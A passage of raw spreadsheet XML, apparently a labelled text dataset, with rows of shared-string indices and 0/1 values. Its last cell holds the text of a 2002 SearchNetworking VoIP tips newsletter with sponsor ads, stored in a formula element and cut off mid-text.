      <c r="D7031" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7032" hidden="1">
      <c r="A7032" s="1">
        <v>7030.0</v>
      </c>
      <c r="B7032" s="1" t="s">
        <v>6521</v>
      </c>
      <c r="C7032" s="1" t="s">
        <v>6530</v>
      </c>
      <c r="D7032" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7033" hidden="1">
      <c r="A7033" s="1">
        <v>7031.0</v>
      </c>
      <c r="B7033" s="1" t="s">
        <v>2622</v>
      </c>
      <c r="C7033" s="1" t="s">
        <v>6751</v>
      </c>
      <c r="D7033" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7034">
      <c r="A7034" s="1">
        <v>7032.0</v>
      </c>
      <c r="B7034" s="1" t="s">
        <v>1440</v>
      </c>
      <c r="C7034" s="1" t="s">
        <v>1441</v>
      </c>
      <c r="D7034" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7035" hidden="1">
      <c r="A7035" s="1">
        <v>7033.0</v>
      </c>
      <c r="B7035" s="1" t="s">
        <v>5194</v>
      </c>
      <c r="C7035" s="1" t="s">
        <v>7939</v>
      </c>
      <c r="D7035" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7036" hidden="1">
      <c r="A7036" s="1">
        <v>7034.0</v>
      </c>
      <c r="B7036" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C7036" s="1" t="s">
        <v>4979</v>
      </c>
      <c r="D7036" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7037">
      <c r="A7037" s="1">
        <v>7035.0</v>
      </c>
      <c r="B7037" s="1" t="s">
        <v>8927</v>
      </c>
      <c r="C7037" s="1" t="s">
        <v>8928</v>
      </c>
      <c r="D7037" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7038" hidden="1">
      <c r="A7038" s="1">
        <v>7036.0</v>
      </c>
      <c r="B7038" s="1" t="s">
        <v>66</v>
      </c>
      <c r="C7038" s="1" t="s">
        <v>7286</v>
      </c>
      <c r="D7038" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7039" hidden="1">
      <c r="A7039" s="1">
        <v>7037.0</v>
      </c>
      <c r="B7039" s="1" t="s">
        <v>266</v>
      </c>
      <c r="C7039" s="1" t="s">
        <v>8929</v>
      </c>
      <c r="D7039" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7040" hidden="1">
      <c r="A7040" s="1">
        <v>7038.0</v>
      </c>
      <c r="B7040" s="1" t="s">
        <v>6652</v>
      </c>
      <c r="C7040" s="1" t="s">
        <v>6653</v>
      </c>
      <c r="D7040" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7041" hidden="1">
      <c r="A7041" s="1">
        <v>7039.0</v>
      </c>
      <c r="B7041" s="1" t="s">
        <v>424</v>
      </c>
      <c r="C7041" s="1" t="s">
        <v>425</v>
      </c>
      <c r="D7041" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7042" hidden="1">
      <c r="A7042" s="1">
        <v>7040.0</v>
      </c>
      <c r="B7042" s="1" t="s">
        <v>2319</v>
      </c>
      <c r="C7042" s="1" t="s">
        <v>2320</v>
      </c>
      <c r="D7042" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7043">
      <c r="A7043" s="1">
        <v>7041.0</v>
      </c>
      <c r="B7043" s="1" t="s">
        <v>8930</v>
      </c>
      <c r="C7043" s="1" t="s">
        <v>8931</v>
      </c>
      <c r="D7043" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7044" hidden="1">
      <c r="A7044" s="1">
        <v>7042.0</v>
      </c>
      <c r="B7044" s="1" t="s">
        <v>6004</v>
      </c>
      <c r="C7044" s="1" t="s">
        <v>8932</v>
      </c>
      <c r="D7044" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7045" hidden="1">
      <c r="A7045" s="1">
        <v>7043.0</v>
      </c>
      <c r="B7045" s="1" t="s">
        <v>4735</v>
      </c>
      <c r="C7045" s="1" t="s">
        <v>8933</v>
      </c>
      <c r="D7045" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7046">
      <c r="A7046" s="1">
        <v>7044.0</v>
      </c>
      <c r="B7046" s="1" t="s">
        <v>5062</v>
      </c>
      <c r="C7046" s="1" t="s">
        <v>8934</v>
      </c>
      <c r="D7046" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7047" hidden="1">
      <c r="A7047" s="1">
        <v>7045.0</v>
      </c>
      <c r="B7047" s="1" t="s">
        <v>655</v>
      </c>
      <c r="C7047" s="1" t="s">
        <v>8935</v>
      </c>
      <c r="D7047" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7048" hidden="1">
      <c r="A7048" s="1">
        <v>7046.0</v>
      </c>
      <c r="B7048" s="1" t="s">
        <v>1190</v>
      </c>
      <c r="C7048" s="1" t="s">
        <v>8214</v>
      </c>
      <c r="D7048" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7049">
      <c r="A7049" s="1">
        <v>7047.0</v>
      </c>
      <c r="B7049" s="1" t="s">
        <v>4300</v>
      </c>
      <c r="C7049" s="1" t="s">
        <v>8936</v>
      </c>
      <c r="D7049" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7050">
      <c r="A7050" s="1">
        <v>7048.0</v>
      </c>
      <c r="B7050" s="1" t="s">
        <v>8937</v>
      </c>
      <c r="C7050" s="1" t="s">
        <v>8938</v>
      </c>
      <c r="D7050" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7051">
      <c r="A7051" s="1">
        <v>7049.0</v>
      </c>
      <c r="B7051" s="1" t="s">
        <v>8939</v>
      </c>
      <c r="C7051" s="1" t="s">
        <v>8940</v>
      </c>
      <c r="D7051" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7052" hidden="1">
      <c r="A7052" s="1">
        <v>7050.0</v>
      </c>
      <c r="B7052" s="1" t="s">
        <v>2020</v>
      </c>
      <c r="C7052" s="1" t="s">
        <v>8869</v>
      </c>
      <c r="D7052" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7053" hidden="1">
      <c r="A7053" s="1">
        <v>7051.0</v>
      </c>
      <c r="B7053" s="1" t="s">
        <v>5884</v>
      </c>
      <c r="C7053" s="1" t="s">
        <v>5885</v>
      </c>
      <c r="D7053" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7054" hidden="1">
      <c r="A7054" s="1">
        <v>7052.0</v>
      </c>
      <c r="B7054" s="1" t="s">
        <v>8835</v>
      </c>
      <c r="C7054" s="1" t="s">
        <v>8836</v>
      </c>
      <c r="D7054" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7055" hidden="1">
      <c r="A7055" s="1">
        <v>7053.0</v>
      </c>
      <c r="B7055" s="1" t="s">
        <v>2622</v>
      </c>
      <c r="C7055" s="1" t="s">
        <v>4186</v>
      </c>
      <c r="D7055" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7056">
      <c r="A7056" s="1">
        <v>7054.0</v>
      </c>
      <c r="B7056" s="1" t="s">
        <v>5254</v>
      </c>
      <c r="D7056" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7057" hidden="1">
      <c r="A7057" s="1">
        <v>7055.0</v>
      </c>
      <c r="B7057" s="1" t="s">
        <v>1560</v>
      </c>
      <c r="C7057" s="1" t="s">
        <v>1561</v>
      </c>
      <c r="D7057" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7058">
      <c r="A7058" s="1">
        <v>7056.0</v>
      </c>
      <c r="B7058" s="1" t="s">
        <v>1046</v>
      </c>
      <c r="C7058" s="1" t="s">
        <v>1047</v>
      </c>
      <c r="D7058" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7059">
      <c r="A7059" s="1">
        <v>7057.0</v>
      </c>
      <c r="B7059" s="1" t="s">
        <v>1351</v>
      </c>
      <c r="C7059" s="1" t="s">
        <v>8941</v>
      </c>
      <c r="D7059" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7060" hidden="1">
      <c r="A7060" s="1">
        <v>7058.0</v>
      </c>
      <c r="B7060" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C7060" s="1" t="s">
        <v>8883</v>
      </c>
      <c r="D7060" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7061">
      <c r="A7061" s="1">
        <v>7059.0</v>
      </c>
      <c r="B7061" s="1" t="s">
        <v>8942</v>
      </c>
      <c r="C7061" s="1" t="s">
        <v>8943</v>
      </c>
      <c r="D7061" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7062" hidden="1">
      <c r="A7062" s="1">
        <v>7060.0</v>
      </c>
      <c r="B7062" s="1" t="s">
        <v>2338</v>
      </c>
      <c r="C7062" s="1" t="s">
        <v>4887</v>
      </c>
      <c r="D7062" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7063" hidden="1">
      <c r="A7063" s="1">
        <v>7061.0</v>
      </c>
      <c r="B7063" s="1" t="s">
        <v>8522</v>
      </c>
      <c r="C7063" s="1" t="s">
        <v>8944</v>
      </c>
      <c r="D7063" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7064" hidden="1">
      <c r="A7064" s="1">
        <v>7062.0</v>
      </c>
      <c r="B7064" s="1" t="s">
        <v>282</v>
      </c>
      <c r="C7064" s="1" t="s">
        <v>5574</v>
      </c>
      <c r="D7064" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7065" hidden="1">
      <c r="A7065" s="1">
        <v>7063.0</v>
      </c>
      <c r="B7065" s="1" t="s">
        <v>8368</v>
      </c>
      <c r="C7065" s="1" t="s">
        <v>8369</v>
      </c>
      <c r="D7065" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7066">
      <c r="A7066" s="1">
        <v>7064.0</v>
      </c>
      <c r="B7066" s="1" t="s">
        <v>8945</v>
      </c>
      <c r="C7066" s="1" t="s">
        <v>8946</v>
      </c>
      <c r="D7066" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7067" hidden="1">
      <c r="A7067" s="1">
        <v>7065.0</v>
      </c>
      <c r="B7067" s="1" t="s">
        <v>204</v>
      </c>
      <c r="C7067" s="1" t="s">
        <v>3771</v>
      </c>
      <c r="D7067" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7068" hidden="1">
      <c r="A7068" s="1">
        <v>7066.0</v>
      </c>
      <c r="B7068" s="1" t="s">
        <v>261</v>
      </c>
      <c r="C7068" s="1" t="s">
        <v>8947</v>
      </c>
      <c r="D7068" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7069">
      <c r="A7069" s="1">
        <v>7067.0</v>
      </c>
      <c r="B7069" s="1" t="s">
        <v>8948</v>
      </c>
      <c r="C7069" s="1" t="s">
        <v>8949</v>
      </c>
      <c r="D7069" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7070" hidden="1">
      <c r="A7070" s="1">
        <v>7068.0</v>
      </c>
      <c r="B7070" s="1" t="s">
        <v>8950</v>
      </c>
      <c r="C7070" s="1" t="s">
        <v>8951</v>
      </c>
      <c r="D7070" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7071">
      <c r="A7071" s="1">
        <v>7069.0</v>
      </c>
      <c r="B7071" s="1" t="s">
        <v>8952</v>
      </c>
      <c r="C7071" s="1" t="s">
        <v>8953</v>
      </c>
      <c r="D7071" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7072">
      <c r="A7072" s="1">
        <v>7070.0</v>
      </c>
      <c r="B7072" s="1" t="s">
        <v>1591</v>
      </c>
      <c r="C7072" s="1" t="s">
        <v>8263</v>
      </c>
      <c r="D7072" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7073" hidden="1">
      <c r="A7073" s="1">
        <v>7071.0</v>
      </c>
      <c r="B7073" s="1" t="s">
        <v>95</v>
      </c>
      <c r="C7073" s="1" t="s">
        <v>3012</v>
      </c>
      <c r="D7073" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7074">
      <c r="A7074" s="1">
        <v>7072.0</v>
      </c>
      <c r="B7074" s="1" t="s">
        <v>1504</v>
      </c>
      <c r="C7074" s="1" t="s">
        <v>1505</v>
      </c>
      <c r="D7074" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7075" hidden="1">
      <c r="A7075" s="1">
        <v>7073.0</v>
      </c>
      <c r="B7075" s="1" t="s">
        <v>8954</v>
      </c>
      <c r="C7075" s="1" t="s">
        <v>8955</v>
      </c>
      <c r="D7075" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7076" hidden="1">
      <c r="A7076" s="1">
        <v>7074.0</v>
      </c>
      <c r="B7076" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C7076" s="1" t="s">
        <v>8220</v>
      </c>
      <c r="D7076" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7077" hidden="1">
      <c r="A7077" s="1">
        <v>7075.0</v>
      </c>
      <c r="B7077" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="C7077" s="1" t="s">
        <v>8956</v>
      </c>
      <c r="D7077" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7078" hidden="1">
      <c r="A7078" s="1">
        <v>7076.0</v>
      </c>
      <c r="B7078" s="1" t="s">
        <v>8957</v>
      </c>
      <c r="C7078" s="1" t="s">
        <v>8958</v>
      </c>
      <c r="D7078" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7079">
      <c r="A7079" s="1">
        <v>7077.0</v>
      </c>
      <c r="B7079" s="1" t="s">
        <v>2700</v>
      </c>
      <c r="C7079" s="1" t="s">
        <v>8959</v>
      </c>
      <c r="D7079" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7080" hidden="1">
      <c r="A7080" s="1">
        <v>7078.0</v>
      </c>
      <c r="B7080" s="1" t="s">
        <v>8032</v>
      </c>
      <c r="C7080" s="1" t="s">
        <v>8033</v>
      </c>
      <c r="D7080" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7081">
      <c r="A7081" s="1">
        <v>7079.0</v>
      </c>
      <c r="B7081" s="1" t="s">
        <v>8960</v>
      </c>
      <c r="C7081" s="1" t="s">
        <v>8961</v>
      </c>
      <c r="D7081" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7082" hidden="1">
      <c r="A7082" s="1">
        <v>7080.0</v>
      </c>
      <c r="B7082" s="1" t="s">
        <v>1816</v>
      </c>
      <c r="C7082" s="1" t="s">
        <v>8962</v>
      </c>
      <c r="D7082" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7083" hidden="1">
      <c r="A7083" s="1">
        <v>7081.0</v>
      </c>
      <c r="B7083" s="1" t="s">
        <v>130</v>
      </c>
      <c r="C7083" s="1" t="s">
        <v>8963</v>
      </c>
      <c r="D7083" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7084" hidden="1">
      <c r="A7084" s="1">
        <v>7082.0</v>
      </c>
      <c r="B7084" s="1" t="s">
        <v>4396</v>
      </c>
      <c r="C7084" s="1" t="s">
        <v>4397</v>
      </c>
      <c r="D7084" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7085" hidden="1">
      <c r="A7085" s="1">
        <v>7083.0</v>
      </c>
      <c r="B7085" s="1" t="s">
        <v>1111</v>
      </c>
      <c r="C7085" s="1" t="s">
        <v>4802</v>
      </c>
      <c r="D7085" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7086" hidden="1">
      <c r="A7086" s="1">
        <v>7084.0</v>
      </c>
      <c r="B7086" s="1" t="s">
        <v>6187</v>
      </c>
      <c r="C7086" s="1" t="s">
        <v>8964</v>
      </c>
      <c r="D7086" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7087" hidden="1">
      <c r="A7087" s="1">
        <v>7085.0</v>
      </c>
      <c r="B7087" s="1" t="s">
        <v>2571</v>
      </c>
      <c r="C7087" s="1" t="s">
        <v>3315</v>
      </c>
      <c r="D7087" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7088">
      <c r="A7088" s="1">
        <v>7086.0</v>
      </c>
      <c r="B7088" s="1" t="s">
        <v>8043</v>
      </c>
      <c r="C7088" s="1" t="s">
        <v>8044</v>
      </c>
      <c r="D7088" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7089" hidden="1">
      <c r="A7089" s="1">
        <v>7087.0</v>
      </c>
      <c r="B7089" s="1" t="s">
        <v>383</v>
      </c>
      <c r="C7089" s="1" t="s">
        <v>8965</v>
      </c>
      <c r="D7089" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7090">
      <c r="A7090" s="1">
        <v>7088.0</v>
      </c>
      <c r="B7090" s="1" t="s">
        <v>1856</v>
      </c>
      <c r="C7090" s="1" t="s">
        <v>1857</v>
      </c>
      <c r="D7090" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7091">
      <c r="A7091" s="1">
        <v>7089.0</v>
      </c>
      <c r="B7091" s="1" t="s">
        <v>8966</v>
      </c>
      <c r="C7091" s="1" t="s">
        <v>8967</v>
      </c>
      <c r="D7091" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7092" hidden="1">
      <c r="A7092" s="1">
        <v>7090.0</v>
      </c>
      <c r="B7092" s="1" t="s">
        <v>1038</v>
      </c>
      <c r="C7092" s="1" t="s">
        <v>1039</v>
      </c>
      <c r="D7092" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7093">
      <c r="A7093" s="1">
        <v>7091.0</v>
      </c>
      <c r="B7093" s="1" t="s">
        <v>8968</v>
      </c>
      <c r="C7093" s="1" t="s">
        <v>8969</v>
      </c>
      <c r="D7093" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7094" hidden="1">
      <c r="A7094" s="1">
        <v>7092.0</v>
      </c>
      <c r="B7094" s="1" t="s">
        <v>486</v>
      </c>
      <c r="C7094" s="1" t="s">
        <v>4692</v>
      </c>
      <c r="D7094" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7095" hidden="1">
      <c r="A7095" s="1">
        <v>7093.0</v>
      </c>
      <c r="B7095" s="1" t="s">
        <v>3452</v>
      </c>
      <c r="C7095" s="1" t="s">
        <v>8970</v>
      </c>
      <c r="D7095" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7096">
      <c r="A7096" s="1">
        <v>7094.0</v>
      </c>
      <c r="B7096" s="1" t="s">
        <v>3999</v>
      </c>
      <c r="C7096" s="1" t="s">
        <v>4000</v>
      </c>
      <c r="D7096" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7097" hidden="1">
      <c r="A7097" s="1">
        <v>7095.0</v>
      </c>
      <c r="B7097" s="1" t="s">
        <v>8971</v>
      </c>
      <c r="C7097" s="1" t="s">
        <v>8972</v>
      </c>
      <c r="D7097" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7098" hidden="1">
      <c r="A7098" s="1">
        <v>7096.0</v>
      </c>
      <c r="B7098" s="1" t="s">
        <v>2571</v>
      </c>
      <c r="C7098" s="1" t="s">
        <v>4378</v>
      </c>
      <c r="D7098" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7099" hidden="1">
      <c r="A7099" s="1">
        <v>7097.0</v>
      </c>
      <c r="B7099" s="1" t="s">
        <v>8973</v>
      </c>
      <c r="C7099" s="1" t="s">
        <v>8974</v>
      </c>
      <c r="D7099" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7100">
      <c r="A7100" s="1">
        <v>7098.0</v>
      </c>
      <c r="B7100" s="1" t="s">
        <v>8975</v>
      </c>
      <c r="C7100" s="1" t="s">
        <v>8976</v>
      </c>
      <c r="D7100" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7101">
      <c r="A7101" s="1">
        <v>7099.0</v>
      </c>
      <c r="B7101" s="1" t="s">
        <v>8977</v>
      </c>
      <c r="C7101" s="1" t="s">
        <v>1319</v>
      </c>
      <c r="D7101" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7102" hidden="1">
      <c r="A7102" s="1">
        <v>7100.0</v>
      </c>
      <c r="B7102" s="1" t="s">
        <v>2054</v>
      </c>
      <c r="C7102" s="1" t="s">
        <v>3942</v>
      </c>
      <c r="D7102" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7103" hidden="1">
      <c r="A7103" s="1">
        <v>7101.0</v>
      </c>
      <c r="B7103" s="1" t="s">
        <v>8978</v>
      </c>
      <c r="C7103" s="1" t="s">
        <v>8979</v>
      </c>
      <c r="D7103" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7104">
      <c r="A7104" s="1">
        <v>7102.0</v>
      </c>
      <c r="B7104" s="1" t="s">
        <v>7407</v>
      </c>
      <c r="C7104" s="1" t="s">
        <v>7408</v>
      </c>
      <c r="D7104" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7105" hidden="1">
      <c r="A7105" s="1">
        <v>7103.0</v>
      </c>
      <c r="B7105" s="1" t="s">
        <v>272</v>
      </c>
      <c r="C7105" s="1" t="s">
        <v>8980</v>
      </c>
      <c r="D7105" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7106">
      <c r="A7106" s="1">
        <v>7104.0</v>
      </c>
      <c r="B7106" s="1" t="s">
        <v>5192</v>
      </c>
      <c r="C7106" s="1" t="s">
        <v>5193</v>
      </c>
      <c r="D7106" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7107">
      <c r="A7107" s="1">
        <v>7105.0</v>
      </c>
      <c r="B7107" s="1" t="s">
        <v>8981</v>
      </c>
      <c r="C7107" s="1" t="s">
        <v>8982</v>
      </c>
      <c r="D7107" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7108">
      <c r="A7108" s="1">
        <v>7106.0</v>
      </c>
      <c r="B7108" s="1" t="s">
        <v>8983</v>
      </c>
      <c r="C7108" s="1" t="s">
        <v>8984</v>
      </c>
      <c r="D7108" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7109" hidden="1">
      <c r="A7109" s="1">
        <v>7107.0</v>
      </c>
      <c r="B7109" s="1" t="s">
        <v>4986</v>
      </c>
      <c r="C7109" s="1" t="s">
        <v>8985</v>
      </c>
      <c r="D7109" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7110" hidden="1">
      <c r="A7110" s="1">
        <v>7108.0</v>
      </c>
      <c r="B7110" s="1" t="s">
        <v>470</v>
      </c>
      <c r="C7110" s="1" t="s">
        <v>8986</v>
      </c>
      <c r="D7110" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7111">
      <c r="A7111" s="1">
        <v>7109.0</v>
      </c>
      <c r="B7111" s="1" t="s">
        <v>8987</v>
      </c>
      <c r="C7111" s="1" t="s">
        <v>8988</v>
      </c>
      <c r="D7111" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7112" hidden="1">
      <c r="A7112" s="1">
        <v>7110.0</v>
      </c>
      <c r="B7112" s="1" t="s">
        <v>140</v>
      </c>
      <c r="C7112" s="1" t="s">
        <v>1079</v>
      </c>
      <c r="D7112" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7113">
      <c r="A7113" s="1">
        <v>7111.0</v>
      </c>
      <c r="B7113" s="1" t="s">
        <v>8989</v>
      </c>
      <c r="C7113" s="1" t="s">
        <v>8990</v>
      </c>
      <c r="D7113" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7114" hidden="1">
      <c r="A7114" s="1">
        <v>7112.0</v>
      </c>
      <c r="B7114" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C7114" s="1" t="s">
        <v>8025</v>
      </c>
      <c r="D7114" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7115" hidden="1">
      <c r="A7115" s="1">
        <v>7113.0</v>
      </c>
      <c r="B7115" s="1" t="s">
        <v>6474</v>
      </c>
      <c r="C7115" s="1" t="s">
        <v>6475</v>
      </c>
      <c r="D7115" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7116" hidden="1">
      <c r="A7116" s="1">
        <v>7114.0</v>
      </c>
      <c r="B7116" s="1" t="s">
        <v>3038</v>
      </c>
      <c r="C7116" s="1" t="s">
        <v>8991</v>
      </c>
      <c r="D7116" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7117" hidden="1">
      <c r="A7117" s="1">
        <v>7115.0</v>
      </c>
      <c r="B7117" s="1" t="s">
        <v>6228</v>
      </c>
      <c r="C7117" s="1" t="s">
        <v>6229</v>
      </c>
      <c r="D7117" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7118" hidden="1">
      <c r="A7118" s="1">
        <v>7116.0</v>
      </c>
      <c r="B7118" s="1" t="s">
        <v>7791</v>
      </c>
      <c r="C7118" s="1" t="s">
        <v>7792</v>
      </c>
      <c r="D7118" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7119" hidden="1">
      <c r="A7119" s="1">
        <v>7117.0</v>
      </c>
      <c r="B7119" s="1" t="s">
        <v>3361</v>
      </c>
      <c r="C7119" s="1" t="s">
        <v>3362</v>
      </c>
      <c r="D7119" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7120" hidden="1">
      <c r="A7120" s="1">
        <v>7118.0</v>
      </c>
      <c r="B7120" s="1" t="s">
        <v>367</v>
      </c>
      <c r="C7120" s="1" t="s">
        <v>2034</v>
      </c>
      <c r="D7120" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7121" hidden="1">
      <c r="A7121" s="1">
        <v>7119.0</v>
      </c>
      <c r="B7121" s="1" t="s">
        <v>5827</v>
      </c>
      <c r="C7121" s="3" t="str">
        <f>-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 SEARCHNETWORKING | Voice over IP Tip
 July 25, 2002
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
 FROM OUR SPONSOR:
 Looking for RISK FREE VoIP?
 http://searchNetworking.com/r/0,,4689,00.htm?quintum
 ________________________________________________________________ 
 IN THIS ISSUE | Table of Contents 
 1. VOIP TIPS 
    - Troubleshooting voice
    - VoIP enable your telephony
    - Understanding delay
 2. IMPORTANT ANNOUNCEMENTS AND LINKS
    - Network management/VoIP/wireless strategies revealed
    - SearchNetworking Webcast archives 
    - Featured Topic: Networks of the future
    - Expert response: Ted Studwell answers your questions
    - Featured book: Microsoft encyclopedia of networking
 ____________________________________________________________________
 ***********************&gt;&gt; SPONSORED BY QUINTUM &lt;&lt;*******************
 LOOKING FOR RISK FREE VoIP?
 Get a RISK FREE VoIP solution that is easy to install and
 cost-effective. Quintum Tenor(R) MultiPath Switches assure voice QoS.
 PATENTED SelectNet provides real-time MID-CALL failover from IP to
 public switched phone network. PacketSaver voice compression reduces
 bandwidth use 50%.  NATAccess works behind NAT-enabled firewalls. 2
 port SOHOs to carrier solutions at:
 http://searchNetworking.com/r/0,,4689,00.htm?quintum
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 TROUBLESHOOTING VOICE | By Tom Lancaster
 When you're troubleshooting voice calls, particularly the signaling,
 it's often helpful to look at the detailed output of the device, be
 it a voice-enabled router, telephony server, gateway or whatever. 
 This detailed output can be in the form of logs or debug output as is
 the case in Cisco's IOS.  In any case, this output is likely to be
 somewhat cryptic.  One of the reasons is because this output often
 uses a set of standardized codes and it is simply easier to put more
 information on the screen using a short number than it is to write an
 essay about why some event happened.
 Read the entire tip at: 
 http://www.searchNetworking.com/tip/1,289483,sid7_gci840618,00.html
 Got a VoIP tip of your own? Why not send it in? We'll post it on our
 Web site, and we'll enter you in our tips contest for some neat
 prizes.   Submit your tip here:
 http://searchnetworking.techtarget.com/tipsSubmit/1,289485,sid7,00.html
 Like this tip?  Hate it?  Email us at
 mailto:tips@searchnetworking.com
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 VoIP ENABLE YOUR TELEPHONY | By Tom Lancaster
 One of the reasons VoIP has been slowly gaining traction is that
 large enterprises have quite a lot of legacy equipment, and migrating
 to VoIP from the circuit-switched networks of yore is no easy feat.
 These environments are typically complicated and the stakes are high
 because so many mission-critical systems rely on telephony.
 Click here for the full tip:
 http://searchnetworking.techtarget.com/tip/1,289483,sid7_gci779073,00.html
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 UNDERSTANDING RELAY | By Tom Lancaster
 Everyone knows that delay is one of the two primary causes of poor
 voice quality, particularly in VoIP networks, but where does this
 delay come from?  Delay is generally defined as the time it takes
 from the instant you speak into the phone until the instant that
 sound is regenerated on the far end. Quite a few things have to
 happen to transport this sound through the system, so delay actually
 has many components.
 Read the entire tip here:
 http://searchnetworking.techtarget.com/tip/1,289483,sid7_gci823706,00.html
 ___________________________________________________________________ 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 ::::::::::  DON'T MISS THESE IMPORTANT MESSAGES AND LINKS  ::::::::
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 NETWORK MANAGEMENT/VoIP/WIRELESS STRATEGIES | SearchNetworking
 SearchNetworking.com hosts the Networking Decisions conference in
 Chicago, October 16-18. Sessions focus not only on essential network
 management strategies, but feature critical insight on VoIP and
